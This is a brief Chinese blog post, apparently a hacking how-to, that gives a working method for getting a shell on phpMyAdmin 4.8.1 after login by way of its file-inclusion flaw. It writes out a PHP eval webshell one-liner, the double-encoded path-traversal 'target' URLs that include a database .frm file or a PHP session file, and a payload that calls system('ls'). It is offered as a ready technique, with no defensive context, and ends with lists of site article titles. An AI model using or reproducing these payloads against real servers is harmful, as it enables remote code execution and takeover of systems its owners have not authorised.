phpmyadmin4.8.1后台getshell

包含文件进行getshell

姿势:

建立数据库的,新建表,字段名为一句话木马。

会生成对应的数据库文件,相应文件的路径查看

select @@datadir;

这个样子就会在/var/lib/mysql/hack/hack.frm的文件里包含着一句话木马的字段。

?target=db_sql.php%253f/../../../../../../var/lib/mysql/data/hack/hack.frm  

权限不够,

不过这个再linux下面倒是很简单,不用考虑权限。

查询语句(一句话木马),

执行查询

select '<?php @eval($_GET["code"])?>'

之后会保存在session文件里。

session文件:

/var/lib/php/sessions/sess_你的SESSION ID  

包含payload:

?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_6ker17rs59cuu39e6rfdpdrcaoto5116&a=system("ls");

最新文章

  1. 用GO语言开发editplus编辑器插件(附源码)
  2. 函数查询(Function Query)
  3. Hibernate 性能优化之二级缓存
  4. Sonar入门(五):使用 Sonar 进行代码质量管理
  5. Intellij idea workflow 工作流插件安装
  6. Android 4.0 ProGuard 代码混淆 以及 proguard returned with error code 1.See console异常的解决方法
  7. Android-2手机应用程序,短信应用
  8. Android Splash界面支持用户点击 直接进入主界面
  9. iOS消息推送相关
  10. 分布式架构实战--ActiveMQ的安装与使用(单节点)
  11. Restful levels&amp;HATEOAS
  12. NFPA, UL
  13. 利用redis List队列简单实现秒杀 PHP代码实现
  14. Web前端开发必备
  15. ThinkPHP5的数据操作和Thinkphp3.2.3对比小结
  16. Qt Creator 中,如何更改h,cpp,ui的文件并不让ui失效
  17. 震旦199打印机扫描A4文件
  18. Keil MDK忽略警告:文件末尾空白行警告
  19. vue项目实现列表页-详情页返回不刷新,再点其他菜单项返回刷新的需求
  20. java客户端调用ftp上传下载文件

热门文章

  1. 条件注解@Conditional
  2. 【迷你微信】基于MINA、Hibernate、Spring、Protobuf的即时聊天系统:10.项目介绍之架构(2)
  3. git简易使用指南
  4. IDEA 编辑器如何将tabs 分行显示
  5. C#条件运算符(?:)
  6. 第三篇、Swift基础学习
  7. 1911: [Apio2010]特别行动队
  8. 抽屉head部分,hover应用,鼠标放上变色
  9. Mybatis 插入一条或批量插入 返回带有自增长主键记录
  10. 谈谈Integer中的静态类IntegerCache